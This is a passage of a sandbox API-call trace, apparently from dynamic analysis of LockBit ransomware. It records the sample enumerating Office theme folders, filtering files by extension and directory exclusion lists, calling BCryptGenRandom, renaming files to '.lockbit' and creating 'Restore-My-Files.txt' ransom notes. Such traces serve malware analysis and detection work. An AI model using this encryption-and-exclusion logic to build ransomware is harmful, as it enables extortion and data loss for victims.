[0190.710] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.710] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.711] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx.lockbit") returned 74 [0190.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\technic.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0190.717] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.717] malloc (_Size=0x40068) returned 0x3f70048 [0190.717] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=68995) returned 1 [0190.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0190.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0190.719] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0190.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.721] malloc (_Size=0xaa) returned 0x1fa2ed8 [0190.721] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0190.723] free (_Block=0x1fa2ed8) [0190.723] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.723] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.723] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59706a00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x59706a00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x15d75, dwReserved0=0x0, dwReserved1=0x0, cFileName="Thatch.thmx", cAlternateFileName="THATCH~1.THM")) returned 1 [0190.723] lstrcmpiW (lpString1=".", lpString2="Thatch.thmx") returned -1 [0190.723] lstrcmpiW (lpString1="..", lpString2="Thatch.thmx") returned -1 [0190.723] PathFindExtensionW (pszPath="Thatch.thmx") returned=".thmx" [0190.723] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.723] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.723] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.723] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.723] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.723] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.723] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.724] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.724] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.725] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Thatch.thmx") returned -1 [0190.725] lstrcmpiW (lpString1="ntldr", lpString2="Thatch.thmx") returned -1 [0190.725] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Thatch.thmx") returned -1 [0190.725] lstrcmpiW (lpString1="bootsect.bak", lpString2="Thatch.thmx") returned -1 [0190.726] lstrcmpiW (lpString1="autorun.inf", lpString2="Thatch.thmx") returned -1 [0190.726] lstrcmpiW (lpString1="thumbs.db", lpString2="Thatch.thmx") returned 1 [0190.726] lstrcmpiW (lpString1="iconcache.db", lpString2="Thatch.thmx") returned -1 [0190.726] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.726] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx") returned=".thmx" [0190.726] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.726] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.726] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.727] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.727] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx.lockbit") returned 73 [0190.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\thatch.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0190.732] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.732] malloc (_Size=0x40068) returned 0x3e70008 [0190.732] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=89461) returned 1 [0190.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0190.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0190.733] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0190.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.737] malloc (_Size=0xa8) returned 0x1fa2ed8 [0190.737] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0190.738] free (_Block=0x1fa2ed8) [0190.738] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.738] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.738] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.738] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c9cf70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x603f4990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Theme Colors", cAlternateFileName="THEMEC~1")) returned 1 [0190.738] lstrcmpiW (lpString1=".", lpString2="Theme Colors") returned -1 [0190.738] lstrcmpiW (lpString1="..", lpString2="Theme Colors") returned -1 [0190.738] lstrcmpiW (lpString1="Theme Colors", lpString2="$windows.~bt") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="intel") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="msocache") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="$recycle.bin") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="$windows.~ws") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="tor browser") returned -1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="boot") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="system volume information") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="perflogs") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="google") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="application data") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="windows") returned -1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="windows.old") returned -1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="appdata") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="Windows nt") returned -1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="Msbuild") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="Microsoft") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="All users") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="mozilla") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="Microsoft.NET") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="microsoft shared") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="Internet Explorer") returned 1 [0190.739] lstrcmpiW (lpString1="Theme Colors", lpString2="common files") returned 1 [0190.740] lstrcmpiW (lpString1="Theme Colors", lpString2="opera") returned 1 [0190.740] lstrcmpiW (lpString1="Theme Colors", lpString2="Windows Journal") returned -1 [0190.740] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 66 [0190.740] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\*") returned 68 [0190.740] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0190.750] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0190.750] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c9cf70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x603f4990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.811] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0190.811] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0190.811] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5300, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xccc5300, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.xml", cAlternateFileName="ADJACE~1.XML")) returned 1 [0190.811] lstrcmpiW (lpString1=".", lpString2="Adjacency.xml") returned -1 [0190.811] lstrcmpiW (lpString1="..", lpString2="Adjacency.xml") returned -1 [0190.811] PathFindExtensionW (pszPath="Adjacency.xml") returned=".xml" [0190.811] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0190.811] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0190.812] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0190.813] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Adjacency.xml") returned 1 [0190.813] lstrcmpiW (lpString1="ntldr", lpString2="Adjacency.xml") returned 1 [0190.813] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Adjacency.xml") returned 1 [0190.813] lstrcmpiW (lpString1="bootsect.bak", lpString2="Adjacency.xml") returned 1 [0190.813] lstrcmpiW (lpString1="autorun.inf", lpString2="Adjacency.xml") returned 1 [0190.813] lstrcmpiW (lpString1="thumbs.db", lpString2="Adjacency.xml") returned 1 [0190.813] lstrcmpiW (lpString1="iconcache.db", lpString2="Adjacency.xml") returned 1 [0190.813] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0190.813] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml") returned=".xml" [0190.814] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0190.814] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0190.814] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0190.815] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0190.815] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0190.815] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0190.815] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0190.815] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0190.815] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml.lockbit") returned 88 [0190.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\adjacency.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0190.816] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.817] malloc (_Size=0x40068) returned 0x3df0008 [0190.817] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=928) returned 1 [0190.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.818] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0191.570] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.570] malloc (_Size=0xc6) returned 0x1fa2ed8 [0191.570] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0191.577] free (_Block=0x1fa2ed8) [0191.577] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml" | out: pszPath="C:\\\\Program 